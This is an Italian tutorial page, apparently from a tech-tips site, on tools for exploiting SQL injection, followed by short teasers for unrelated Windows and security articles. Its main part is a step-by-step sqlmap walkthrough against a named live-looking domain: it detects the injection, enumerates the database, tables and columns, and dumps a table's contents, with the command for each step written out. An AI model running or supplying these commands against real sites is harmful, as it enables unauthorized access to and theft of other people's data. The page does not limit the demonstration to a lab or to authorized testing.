Web6: SQL Injection - Alcuni strumenti di sfruttamento

Web6: SQL Injection - Alcuni strumenti di sfruttamento

In questa sezione LuckyTemplates ti presenterà alcuni strumenti utilizzati per sfruttare SQL Injection .

Attualmente esistono molti strumenti di scansione delle vulnerabilità della sicurezza (inclusa l'iniezione SQL). Questi strumenti consentono di rilevare e sfruttare in modo abbastanza efficace le vulnerabilità dell'SQL injection. Alcuni strumenti di sfruttamento delle vulnerabilità SQL injection automatici comunemente utilizzati includono:

  • SQLmap
  • La Talpa (Scavando i tuoi dati)
  • Havij

Ci sono anche altri strumenti a cui puoi fare riferimento come: Netsparker, jSQL Injection, Burp, BBQSQL...

Di seguito è riportata una demo dell'utilizzo di Sqlmap per sfruttare l'SQL injection di base.

Puoi scaricare Sqlmap su http://sqlmap.org/

Sqlmap è scritto in Python, quindi per utilizzare questo strumento è necessario installare Python. Puoi scaricare Python da http://www.python.org/downloads/

Per prima cosa devi identificare il sito web di destinazione, qui ho il seguente target: http://zerocoolhf.altervista.org/level1.php?id=1 (questa pagina ora è morta).

Passaggio 1 : apri cmd e digita il seguente comando:

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”

Web6: SQL Injection - Alcuni strumenti di sfruttamento

sqlmap rileverà la vulnerabilità della destinazione e fornirà informazioni sulla vulnerabilità.

Passaggio 2 : una volta stabilito che il sito Web di destinazione presenta una vulnerabilità SQL injection, procediamo alla ricerca del nome del database.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs

Web6: SQL Injection - Alcuni strumenti di sfruttamento

=> Database: mio_zerocoolhf

Passaggio 3 : dopo aver determinato il nome del database, continueremo a trovare i nomi delle tabelle nel database.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf

Web6: SQL Injection - Alcuni strumenti di sfruttamento

=> Ci sono 2 tabelle nel database: auth e book

Passaggio 4 : determinare i nomi delle colonne nella tabella

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book

Web6: SQL Injection - Alcuni strumenti di sfruttamento

=> Individua le colonne nella tabella del libro: autore, id, prezzo, titolo.

Passaggio 5 : scarica i dati dalla tabella.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book

Web6: SQL Injection - Alcuni strumenti di sfruttamento

=> Quindi abbiamo ottenuto il database del sito web di destinazione.

Sopra è riportata una demo di base dell'utilizzo di sqlmap per sfruttare gli errori di SQL injection. Puoi saperne di più sulle opzioni sqlmap su https://github.com/sqlmapproject/sqlmap/wiki/Usage per supportare lo sfruttamento. SQL injection exploit.


6 cose che puoi fare con lapp Meteo su Windows 10

6 cose che puoi fare con lapp Meteo su Windows 10

L'app Meteo su Windows 10 è integrata nel sistema operativo e fornisce informazioni dettagliate relative al meteo, indipendentemente da dove ti trovi. La semplice interfaccia dell'app fornisce dati meteo e previsioni passati, presenti e futuri, nonché notizie meteorologiche internazionali.

Come visualizzare la temperatura in °C o °F nellapp Meteo su Windows 10

Come visualizzare la temperatura in °C o °F nellapp Meteo su Windows 10

Le previsioni possono essere facilmente impostate per mostrare qualsiasi città o luogo desiderato, da qualsiasi parte del mondo, e visualizzare le temperature in gradi Celsius (°C). Questa impostazione può essere regolata nell'app Meteo su Windows 10 e nel widget "Notizie e interessi" sulla barra delle applicazioni.

I migliori siti Web per apprendere abilità di hacking

I migliori siti Web per apprendere abilità di hacking

Quando si parla di hacker, forse il primo stereotipo che immaginiamo è quello dello studente universitario o dell’esperto nel campo dell’informatica.

Come creare e utilizzare checkpoint Hyper-V in Windows 10

Come creare e utilizzare checkpoint Hyper-V in Windows 10

Checkpoint è una potente funzionalità di Hyper-V che semplifica l'annullamento di eventuali modifiche su una macchina virtuale.

3 strumenti per leggere gratuitamente le estensioni dei file DMG su PC Windows

3 strumenti per leggere gratuitamente le estensioni dei file DMG su PC Windows

Il formato file immagine DMG è il formato di archiviazione file più popolare utilizzato per distribuire software su Mac OS X. Questa estensione file non può essere letta sui computer PC Windows. Tuttavia, se desideri leggere questa estensione di file su un PC Windows, puoi chiedere il supporto di un'applicazione di terze parti.

Come aggiungere/rimuovere Accesso rapido nel riquadro di navigazione Esplora file su Windows 10

Come aggiungere/rimuovere Accesso rapido nel riquadro di navigazione Esplora file su Windows 10

L'accesso rapido è il percorso più breve per raggiungere i file su cui stai lavorando e le cartelle che usi spesso. Queste sono le cartelle a cui accedi di frequente e i file recenti.

Recensione Opera VPN: semplice, veloce e gratuita

Recensione Opera VPN: semplice, veloce e gratuita

Forse hai sentito che il browser web Opera viene fornito con una VPN gratuita, o forse sei già un amante di Opera e vuoi semplicemente sapere come funziona il loro servizio VPN.

Come e perché dovresti disabilitare le reti Wi-Fi a 2,4 GHz?

Come e perché dovresti disabilitare le reti Wi-Fi a 2,4 GHz?

Dovresti considerare di disattivare la vecchia banda da 2,4 GHz sulla tua rete Wi-Fi domestica e di utilizzare la nuova banda da 5 GHz, più veloce e meno "affollata". Scopriamolo attraverso il seguente articolo.

Come abilitare la funzionalità sandbox su Windows Defender

Come abilitare la funzionalità sandbox su Windows Defender

Il motore antivirus integrato di Microsoft Windows Defender è diventato il primo software antivirus in grado di funzionare in un ambiente sandbox.

Cosè il ransomware Screen Locker? Come rimuovere?

Cosè il ransomware Screen Locker? Come rimuovere?

Screen Locker Ransomware è un tipo di ransomware che prende il controllo dello schermo e ti impedisce di utilizzare il tuo dispositivo. Questo tipo di ransomware è in aumento e può essere molto difficile da rimuovere senza informazioni sufficienti al riguardo.